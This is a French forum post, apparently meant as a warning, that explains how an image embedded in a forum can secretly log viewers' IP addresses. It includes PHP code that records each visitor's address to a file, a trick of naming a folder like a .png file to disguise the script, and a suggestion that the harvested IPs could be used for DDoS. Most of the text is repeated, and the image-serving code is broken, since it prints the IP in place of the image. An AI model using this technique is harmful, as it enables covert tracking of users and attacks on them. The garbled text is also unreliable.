J'ai la triste nouvelle de vous annoncer que ...
Il y a une faille de sécurité sur ce forum.
Quelle type de faille ? C'est une faille récupérant l'adresse IP des plusieurs membres.
Après libre aux hackers d'en faire ce qui en veulent.
Qui sait ... le DDoS ? (moi je le ferrais pas, mon but est juste d'avertir de cette faille).
Cette faille marche avec les images.
Vous voyez l'image ci-dessous? (seul vous pouvez la voir ne vous inquiétez pas)
Voici votre IP:
Je vous explique comment cela fonctionne:
Je tiens encore une fois à dire que je ne sauvegarde pas votre adresse IP et que l'image varie en fonction de la personne.
Mon but est juste d'avertir de cette faille et de pousser les gens à utiliser un VPN pour contrer les abus comme le DDoS sur l'IP d'origine alors qu'en cachant l'IP avec un VPN il est plus difficile à DDoS et il suffit juste de changer d'IP en cas de réussite.
Il y a une faille de sécurité sur ce forum.
Quelle type de faille ? C'est une faille récupérant l'adresse IP des plusieurs membres.
Après libre aux hackers d'en faire ce qui en veulent.
Qui sait ... le DDoS ? (moi je le ferrais pas, mon but est juste d'avertir de cette faille).
Cette faille marche avec les images.
Vous voyez l'image ci-dessous? (seul vous pouvez la voir ne vous inquiétez pas)
Voici votre IP:
Je vous explique comment cela fonctionne:
- on récupère l'IP.
PHP:$a = $_SERVER['REMOTE_ADDR'];
- On stocke l'IP dans un fichier si on est dans la peau d'un hacker
PHP:$f = fopen('mon_fichier', 'a+'); /* Ouvrir le fichier mon_fichier. Le mode a+ permet de le créer si l'es inexistant */ fwrite($f, $a); /* Écrire dans le fichier ouvert dans la variable $f l'Ip inscrite dans $a */ fclose($f); /* puis on ferme le fichier comme on ferme la porte car après ça caille dehors */
- Puis après on affiche l'image comme si rien n'était
PHP:header('Content-Type: image/jpg'); /* On dit au navigateur qu'il s'agit d'une image jpg */ $image = file_get_contents('une_image.jpg'); /* On recupère le contenu textuelle de l'image "une_image.jpg" */ print($a); /* On affiche le contenu de l'image contenu dans $a */
- Ensuite on place le script dans un répertoire d'un nom de fichier comme:
www.domaine.fr/dossier-non-suspect.png/index.php
dont on est pas obligé de mettre index.php dans l'URL dans un navigateur web puisque le .htaccess le lit par défaut.
Donc dossier-non-suspect.png pourrait ressembler à un fichier. - Puis enfin on insert l'image avec l'URL similaire à l'exemple indiqué ci-dessus.
Je tiens encore une fois à dire que je ne sauvegarde pas votre adresse IP et que l'image varie en fonction de la personne.
Mon but est juste d'avertir de cette faille et de pousser les gens à utiliser un VPN pour contrer les abus comme le DDoS sur l'IP d'origine alors qu'en cachant l'IP avec un VPN il est plus difficile à DDoS et il suffit juste de changer d'IP en cas de réussite.
Dernière édition: